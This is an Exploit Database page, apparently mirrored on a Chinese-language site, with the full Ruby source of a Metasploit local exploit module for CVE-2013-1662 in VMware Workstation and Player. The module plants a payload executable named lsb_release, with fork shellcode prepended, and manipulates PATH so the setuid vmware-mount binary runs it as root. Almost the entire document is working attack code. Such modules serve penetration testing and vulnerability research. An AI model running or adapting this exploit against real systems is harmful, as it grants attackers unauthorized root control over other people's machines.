VMware – Setuid VMware-mount Unsafe popen(3) (Metasploit)

• Exploit Database
• 14 阅读

• 作者： Metasploit
  日期： 2013-08-29
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/27938/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # web site for more information on licensing and terms of use.
  # http://metasploit.com/
  ##
  
  require 'msf/core'
  require 'rex'
  require 'msf/core/post/common'
  require 'msf/core/post/file'
  
  class Metasploit4 < Msf::Exploit::Local
  
  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File
  
  def initialize(info={})
  super( update_info( info, {
  'Name'=> 'VMWare Setuid vmware-mount Unsafe popen(3)',
  'Description' => %q{
  VMWare Workstation (up to and including 9.0.2 build-1031769)
  and Player have a setuid executable called vmware-mount that
  invokes lsb_release in the PATH with popen(3). Since PATH is
  user-controlled, and the default system shell on
  Debian-derived distributions does not drop privs, we can put
  an arbitrary payload in an executable called lsb_release and
  have vmware-mount happily execute it as root for us.
  },
  'License' => MSF_LICENSE,
  'Author'=>
  [
  'Tavis Ormandy', # Vulnerability discovery and PoC
  'egypt' # Metasploit module
  ],
  'Platform'=> [ 'linux' ],
  'Arch'=> ARCH_X86,
  'Targets' =>
  [
  [ 'Automatic', { } ],
  ],
  'DefaultOptions' => {
  "PrependSetresuid" => true,
  "PrependSetresgid" => true,
  },
  'Privileged' => true,
  'DefaultTarget' => 0,
  'References' => [
  [ 'CVE', '2013-1662' ],
  [ 'OSVDB', '96588' ],
  [ 'BID', '61966'],
  [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
  [ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
  ],
  'DisclosureDate' => "Aug 22 2013"
  }
  ))
  # Handled by ghetto hardcoding below.
  deregister_options("PrependFork")
  end
  
  def check
  if setuid?("/usr/bin/vmware-mount")
  CheckCode::Vulnerable
  else
  CheckCode::Safe
  end
  end
  
  def exploit
  unless check == CheckCode::Vulnerable
  fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
  end
  
  # Ghetto PrependFork action which is apparently only implemented for
  # Meterpreter.
  # XXX Put this in a mixin somewhere
  # if(fork()) exit(0);
  # 6A02push byte +0x2
  # 58pop eax
  # CD80int 0x80 ; fork
  # 85C0test eax,eax
  # 7406jz 0xf
  # 31C0xor eax,eax
  # B001mov al,0x1
  # CD80int 0x80 ; exit
  exe = generate_payload_exe(
  :code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
  )
  write_file("lsb_release", exe)
  
  cmd_exec("chmod +x lsb_release")
  cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
  # Delete it here instead of using FileDropper because the original
  # session can clean it up
  cmd_exec("rm -f lsb_release")
  end
  
  def setuid?(remote_file)
  !!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true")
  end
  
  end